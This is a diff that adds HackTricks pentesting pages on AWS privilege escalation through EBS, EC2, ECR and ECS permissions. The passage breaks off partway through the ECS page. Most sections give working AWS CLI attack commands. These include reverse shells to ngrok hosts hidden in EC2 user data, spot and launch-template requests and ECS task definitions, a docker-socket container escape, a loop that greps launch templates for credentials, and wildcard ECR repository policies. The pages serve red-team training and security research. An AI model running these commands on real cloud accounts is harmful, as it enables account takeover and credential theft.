+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EBS + +### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` + +An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: + +{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %} +[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) +{% endcontent-ref %} + +Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` + +The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. + +**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). + +### **`ec2:CreateSnapshot`** + +Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. + +You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md new file mode 100644 index 0000000000..678a7bdf35 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -0,0 +1,335 @@ +# AWS - EC2 Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EC2 + +For more **info about EC2** check: + +{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +### `iam:PassRole`, `ec2:RunInstances` + +An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. + +* **Access via SSH** + +Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). + +```bash +aws ec2 run-instances --image-id --instance-type t2.micro \ + --iam-instance-profile Name= --key-name \ + --security-group-ids +``` + +* **Access via rev shell in user data** + +You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. + +```bash +echo '#!/bin/bash +curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh + +aws ec2 run-instances --image-id --instance-type t2.micro \ + --iam-instance-profile Name=E \ + --count 1 \ + --user-data "file:///tmp/rev.sh" +``` + +Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: + +{% content-ref url="../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md" %} +[aws-guardduty-enum.md](../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) +{% endcontent-ref %} + +**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. + +#### Privesc to ECS + +With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. 
This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. + +{% code overflow="wrap" %} +```bash +aws ec2 run-instances \ + --image-id ami-07fde2ae86109a2af \ + --instance-type t2.micro \ + --iam-instance-profile \ + --count 1 --key-name pwned \ + --user-data "file:///tmp/asd.sh" + +# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) +# The EC2 instance profile needs basic ECS access +# The content of the user data is: +#!/bin/bash +echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; +``` +{% endcode %} + +To learn how to **force ECS services to be run** in this new EC2 instance check: + +{% content-ref url="aws-ecs-privesc.md" %} +[aws-ecs-privesc.md](aws-ecs-privesc.md) +{% endcontent-ref %} + +If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. + +**Potential Impact:** Direct privesc to ECS roles attached to tasks. + +### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** + +Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ +As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. 
+ +{% code overflow="wrap" %} +```bash +# Removing role from instance profile +aws iam remove-role-from-instance-profile --instance-profile-name --role-name + +# Add role to instance profile +aws iam add-role-to-instance-profile --instance-profile-name --role-name +``` +{% endcode %} + +If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** + +* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* + +{% code overflow="wrap" %} +```bash +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} + +**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). + +### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`) + +With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. 
+ +* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* + +{% code overflow="wrap" %} +```bash +aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da +aws ec2 disassociate-iam-instance-profile --association-id +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} + +* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* + +{% code overflow="wrap" %} +```` +```bash +aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id +``` +```` +{% endcode %} + +**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). + +### `ec2:RequestSpotInstances`,`iam:PassRole` + +An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\ +Once the instance is run, he can **steal the IAM role**. + +{% code overflow="wrap" %} +```bash +REV=$(printf '#!/bin/bash +curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash +' | base64) + +aws ec2 request-spot-instances \ + --instance-count 1 \ + --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" +``` +{% endcode %} + +### `ec2:ModifyInstanceAttribute` + +An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**. 
+ +Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**. + +```bash +TEXT='Content-Type: multipart/mixed; boundary="//" +MIME-Version: 1.0 + +--// +Content-Type: text/cloud-config; charset="us-ascii" +MIME-Version: 1.0 +Content-Transfer-Encoding: 7bit +Content-Disposition: attachment; filename="cloud-config.txt" + +#cloud-config +cloud_final_modules: +- [scripts-user, always] + +--// +Content-Type: text/x-shellscript; charset="us-ascii" +MIME-Version: 1.0 +Content-Transfer-Encoding: 7bit +Content-Disposition: attachment; filename="userdata.txt" + +#!/bin/bash +bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1 +--//' +TEXT_PATH="/tmp/text.b64.txt" + +printf $TEXT | base64 > "$TEXT_PATH" + +aws ec2 stop-instances --instance-ids $INSTANCE_ID + +aws ec2 modify-instance-attribute \ + --instance-id="$INSTANCE_ID" \ + --attribute userData \ + --value file://$TEXT_PATH + +aws ec2 start-instances --instance-ids $INSTANCE_ID +``` + +**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance. + +### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate` + +An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell. 
+ +{% code overflow="wrap" %} +```bash +REV=$(printf '#!/bin/bash +curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash +' | base64) + +aws ec2 create-launch-template-version \ + --launch-template-name bad_template \ + --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" + +aws ec2 modify-launch-template \ + --launch-template-name bad_template \ + --default-version 2 +``` +{% endcode %} + +**Potential Impact:** Direct privesc to a different EC2 role. + +### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole` + +An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**. + +```bash +aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \ + --launch-configuration-name bad_config \ + --image-id ami-0c1bc246476a5572b \ + --instance-type t3.micro \ + --iam-instance-profile EC2-CloudWatch-Agent-Role \ + --user-data "$REV" + +aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \ + --auto-scaling-group-name bad_auto \ + --min-size 1 --max-size 1 \ + --launch-configuration-name bad_config \ + --desired-capacity 1 \ + --vpc-zone-identifier "subnet-e282f9b8" +``` + +**Potential Impact:** Direct privesc to a different EC2 role. 
+ +### `!autoscaling` + +The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc). + +### `ec2-instance-connect:SendSSHPublicKey` + +An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges. + +```bash +aws ec2-instance-connect send-ssh-public-key \ + --instance-id "$INSTANCE_ID" \ + --instance-os-user "ec2-user" \ + --ssh-public-key "file://$PUBK_PATH" +``` + +**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances. + +### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` + +An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. + +In order to connect to the serial port you also **need to know the username and password of a user** inside the machine. + +{% code overflow="wrap" %} +```bash +aws ec2 enable-serial-console-access + +aws ec2-instance-connect send-serial-console-ssh-public-key \ + --instance-id "$INSTANCE_ID" \ + --serial-port 0 \ + --region "eu-west-1" \ + --ssh-public-key "file://$PUBK_PATH" + +ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws +``` +{% endcode %} + +This way isn't that useful to privesc as you need to know a username and password to exploit it. + +**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances. 
+ +### `describe-launch-templates`,`describe-launch-template-versions` + +Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates: + +{% code overflow="wrap" %} +```bash +for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId') +do + echo "[*] Analyzing $i" + aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata + do + echo "VersionNumber: $version" + echo "$userdata" | base64 -d + echo + done | grep -iE "aws_|password|token|api" +done +``` +{% endcode %} + +In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information. + +Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS. + +**Potential Impact:** Direct privilege escalation to IAM user(s). + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md new file mode 100644 index 0000000000..9a84a0d29f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md @@ -0,0 +1,136 @@ +# AWS - ECR Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECR + +### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` + +An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. + +For more info on how to download images: + +{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} +[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) +{% endcontent-ref %} + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. + +### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` + +An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. + +To learn how to upload a new image/update one, check: + +{% content-ref url="../aws-services/aws-eks-enum.md" %} +[aws-eks-enum.md](../aws-services/aws-eks-enum.md) +{% endcontent-ref %} + +### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` + +Like the previous section, but for public repositories. + +### `ecr:SetRepositoryPolicy` + +An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ +For example, in this example read access is given to everyone. 
+ +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +Contents of `my-policy.json`: + +```json +{ + "Version" : "2008-10-17", + "Statement" : [ + { + "Sid" : "allow public pull", + "Effect" : "Allow", + "Principal" : "*", + "Action" : [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +### `ecr-public:SetRepositoryPolicy` + +Like the previoous section, but for public repositories.\ +An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. + +{% code overflow="wrap" %} +```bash +bashCopy code# Create a JSON file with the malicious public repository policy +echo '{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "MaliciousPublicRepoPolicy", + "Effect": "Allow", + "Principal": "*", + "Action": [ + "ecr-public:GetDownloadUrlForLayer", + "ecr-public:BatchGetImage", + "ecr-public:BatchCheckLayerAvailability", + "ecr-public:PutImage", + "ecr-public:InitiateLayerUpload", + "ecr-public:UploadLayerPart", + "ecr-public:CompleteLayerUpload", + "ecr-public:DeleteRepositoryPolicy" + ] + } + ] +}' > malicious_public_repo_policy.json + +# Apply the malicious public repository policy to the ECR Public repository +aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json +``` +{% endcode %} + +**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. + +### `ecr:PutRegistryPolicy` + +An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. 
+ +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md new file mode 100644 index 0000000000..793ce44c2c --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md @@ -0,0 +1,280 @@ +# AWS - ECS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECS + +More **info about ECS** in: + +{% content-ref url="../aws-services/aws-ecs-enum.md" %} +[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) +{% endcontent-ref %} + +### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask` + +An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**. + +```bash +# Generate task definition with rev shell +aws ecs register-task-definition --family iam_exfiltration \ + --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ + --network-mode "awsvpc" \ + --cpu 256 --memory 512\ + --requires-compatibilities "[\"FARGATE\"]" \ + --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" + +# Run task definition +aws ecs run-task --task-definition iam_exfiltration \ + --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ + --launch-type FARGATE \ + --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" + +# Delete task definition +## You need to remove all the versions (:1 is enough if you just created one) +aws ecs deregister-task-definition --task-definition iam_exfiltration:1 +``` + +**Potential Impact:** Direct privesc to a different ECS role. + +### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask` + +Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\ +However, in this case, a container instance to run the malicious task definition need to be. 
+ +```bash +# Generate task definition with rev shell +aws ecs register-task-definition --family iam_exfiltration \ + --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ + --network-mode "awsvpc" \ + --cpu 256 --memory 512\ + --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" + +aws ecs start-task --task-definition iam_exfiltration \ + --container-instances + +# Delete task definition +## You need to remove all the versions (:1 is enough if you just created one) +aws ecs deregister-task-definition --task-definition iam_exfiltration:1 +``` + +**Potential Impact:** Direct privesc to any ECS role. + +### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)` + +Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.** + +```bash +# Generate task definition with rev shell +aws ecs register-task-definition --family iam_exfiltration \ + --task-role-arn "$ECS_ROLE_ARN" \ + --network-mode "awsvpc" \ + --cpu 256 --memory 512\ + --requires-compatibilities "[\"FARGATE\"]" \ + --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" + +# Run the task creating a service +aws ecs create-service --service-name exfiltration \ + --task-definition iam_exfiltration \ + --desired-count 1 \ + --cluster "$CLUSTER_ARN" \ + --launch-type FARGATE \ + --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" + +# 
Run the task updating a service +aws ecs update-service --cluster \ + --service \ + --task-definition +``` + +**Potential Impact:** Direct privesc to any ECS role. + +### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)` + +Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: + +{% code overflow="wrap" %} +```bash +aws ecs run-task \ + --task-definition "" \ + --overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ + --cluster \ + --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" +``` +{% endcode %} + +**Potential Impact:** Direct privesc to any ECS role. + +### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** + +This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\ +This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ +You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). + +{% hint style="warning" %} +This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. 
+{% endhint %} + +```bash +printf '[ + { + "name":"exfil_creds", + "image":"python:latest", + "entryPoint":["sh", "-c"], + "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], + "mountPoints": [ + { + "readOnly": false, + "containerPath": "/var/run/docker.sock", + "sourceVolume": "docker-socket" + } + ] + } +]' > /tmp/task.json + +printf '[ + { + "name": "docker-socket", + "host": { + "sourcePath": "/var/run/docker.sock" + } + } +]' > /tmp/volumes.json + + +aws ecs register-task-definition --family iam_exfiltration \ + --cpu 256 --memory 512 \ + --requires-compatibilities '["EC2"]' \ + --container-definitions file:///tmp/task.json \ + --volumes file:///tmp/volumes.json + + +aws ecs run-task --task-definition iam_exfiltration \ + --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ + --launch-type EC2 + +# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell +``` + +### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** + +An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\ +However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't). 
+ +Therefore, the attacker cloud try to: + +* **Try to run a command** in every running container + +```bash +# List enableExecuteCommand on each task +for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do + echo "Cluster $cluster" + for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do + echo " Task $task" + # If true, it's your lucky day + aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand + done +done + +# Execute a shell in a container +aws ecs execute-command --interactive \ + --command "sh" \ + --cluster "$CLUSTER_ARN" \ + --task "$TASK_ARN" +``` + +* If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` +* If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` +* If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` +* If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` + +You can find **examples of those options** in **previous ECS privesc sections**. + +**Potential Impact:** Privesc to a different role attached to containers. + +### `ssm:StartSession` + +Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: + +{% content-ref url="aws-ssm-privesc.md" %} +[aws-ssm-privesc.md](aws-ssm-privesc.md) +{% endcontent-ref %} + +### `iam:PassRole`, 